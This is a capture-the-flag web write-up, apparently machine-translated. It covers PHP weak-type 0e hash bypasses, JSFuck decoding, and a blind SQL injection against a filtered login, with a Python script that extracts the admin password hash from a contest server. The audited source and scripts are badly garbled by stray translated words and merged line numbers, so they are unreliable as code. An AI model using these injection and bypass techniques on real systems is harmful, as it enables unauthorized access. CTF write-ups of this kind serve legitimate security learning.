Cstc-web-writeup

0x01 Preface

This time the game web question only made out 3, also is the dish's key foot.

0x02 web-sign-in question PHP weak type

Look at the source code, found that the user name must be a letter, the password must be a number, landing page can be used to start with a 0e MD5 value bypass, the following list a string of 0e MD5 value

1<?PHP2 Var_dump(MD5(' 240610708 ') = =MD5(' Qnkcdzo ')); BOOL (TRUE)3 Var_dump(MD5(' aabg7xss ') = =MD5(' Aabc9rqs ')); //bool (true) 4 Var_dump(SHA1(' aarozmok ') = =SHA1(' Aak1stfy ')); //bool (true) 5 Var_dump(SHA1(' aao8zkzf ') = =SHA1(' aa3off9m ')); //bool (true) 6 Var_dump(' 0010e2 ' = = ' 1e3 '); //bool (true) 7 Var_dump(' 0x1234ab ' = = ' 1193131 '); //bool (true) 8 Var_dump(' 0xABCdef ' = = ' 0xABCdef '); //bool (true) 9?>

Here is the use of PHP weak type of vulnerability, 0e at the beginning of the MD5 value in the comparison, the 0e will be recognized as scientific notation, the string to the number type of conversion, 0 of many times or 0 so equal, bypassing

The second part is the code audit, the same is the use of PHP weak type to decode the contents of the Json_decode, the value of the key key is compared with the $key, if the correct return flag

When PHP compares numbers to strings, it converts the strings to numeric types before comparing them.

<?php
Var_dump ("admin" ==0);//bool (True)
Var_dump ("0e123" ==0);//bool (True)
Var_dump ("4test" ==4);//bool (True)
?>

So our POC is message={"key": 0} to get flag

0X03 Web Draw

In Http://117.34.111.15/js/jQuery.js found a string of Jsfuck encryption, decryption can get flag recommended two Jsfuck the site

Www.jsfuck.com

Https://enkhee-osiris.github.io/Decoder-JSFuck

0x04 Web Soeasy

1<?PHP2 3 include("config.php");4 5 $conn->query ("Set Names UTF8");6 7 functionRANDSTR ($lenth=32){8     $strBase= "1234567890QWERTYUIOPASDFGHJKLZXCVBNMQWERTYUIOPASDFGHJKLZXCVBNM";9     $str= "";Ten      while($lenth>0){ One       $str.=substr($strBase,Rand(0,strlen($strBase)-1), 1); A       $lenth--; -     } -    return $str; the } -  - if($install){ -     $sql= "CREATE table ' user ' ( + ' id ' int (ten) unsigned not NULL PRIMARY KEY auto_increment, - ' username ' varchar (+) not NULL, + ' passwd ' varchar (+) not NULL, A ' role ' varchar (not NULL) at) Engine=myisam auto_increment=1 DEFAULT charset=latin1 collate=latin1_general_ci "; -     if($conn->query ($sql)){ -        $sql= "INSERT INTO ' user ' (' username ', ' passwd ', ' role ') VALUES (' admin ', '".MD5(Randstr ()). "', ' admin ')"; -        $conn, Query ($sql); -     } - } in  - functionFilter$str){ to      $filter= "/|\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\| | ' |&| '.UrlDecode('%09 '). "|".UrlDecode("%0a"). "|".UrlDecode("%0b"). "|".UrlDecode('%0c '). "|".UrlDecode('%0d '). "|".UrlDecode('%a0 '). " /I ";  +      if(Preg_match($filter,$str)){ -           die("You can ' t-input this illegal char!"); the      } *      return $str;  $ Panax Notoginseng } -  the  + functionShow$username){ A   Global $conn; the   $sql= "Select role from ' user ' where username = '".$username."‘"; +   $res=$conn->query ($sql); -   if($res->num_rows>0){ $  $       Echo"$usernameIs ".$res-&GT;FETCH_ASSOC () [' Role ']; -}Else{ -        die("Don ' t has this user!"); the   } - }Wuyi  the functionLogin$username,$passwd){ -     Global $conn; Wu     Global $flag; -  About     $username=Trim(Strtolower($username)); $     $passwd=Trim(Strtolower($passwd)); -     if($username= = ' Admin '){ -          die("You can ' t login this as admin!"); -     } A      +     $sql= "SELECT * from ' user ' where Username= '".$conn->escape_string ($username). "' and passwd= '".$conn->escape_string ($passwd)."‘"; the     $res=$conn->query ($sql); -     if($res->num_rows>0){ $         if($res-&GT;FETCH_ASSOC () [' role '] = = = ' Admin ')Exit($flag); the}Else{ the        Echo"Sorry,username or passwd error!";  the     } the  - } in  the functionSource () { the  About     Highlight_file(__file__); the } the  the $username=isset($_post[' username '])? Filter$_post[' username ']): ""; + $passwd=isset($_post[' passwd '])? Filter$_post[' passwd ']): ""; -  the $action=isset($_get[' Action ']? Filter$_get[' Action ']): "Source";Bayi  the Switch($action){ the     Case"Source": Source (); Break ; -     Case"Login": Login ($username,$passwd); Break; -     Case"Show": Show ($username); Break; the}

Action has three modes of source login show, source is to make the code highlight, login is required to login, show is to find whether username exists

View source know username for admin password for a string randomly generated 32 string MD5 value obviously through login here blasting password is not advisable, and login to bypass admin, here refer to P cattle article, with%C2 can bypass

Back to the point here in the login field there is a $sql statement that can be injected, belongs to the blinds, and the following fields are filtered

1<?PHP2*3 ;4,5  is6 Union7  like8 RegExp9  forTen  and One or A file --- -| the ` -& - Space -?>

View Code

This problem is a little bit like the SWUP-CTF question.

() can bypass the space, apply Select*from xx where xx= ' 0 ' = ' 1 ' = ' 0 ' and then put our code in 1.

Direct Release POC

1 #Coding=utf-82 ImportRequests3Url='Http://117.34.111.15:89/index.php?action=show'4string='abcdef0123456789'5flag=""6  forLengthinchRange (1,33):7      forXinchstring:8s=requests.session ()9payload={"username":"username ' = (select (1) from (user) where (Mid ((passwd) from (%d)) = '%s%s ') = '"% (33-Length,x,flag)}Ten         if 'Admin' inchS.post (url,data=payload). Content: Oneflag=x+Flag A             Print33-length,flag

The MD5 value of the password is eventually run out.

Login%C2 bypass principle specific see P cow article MySQL character encoding utilization tips

Final Getflag

Cstc-web-writeup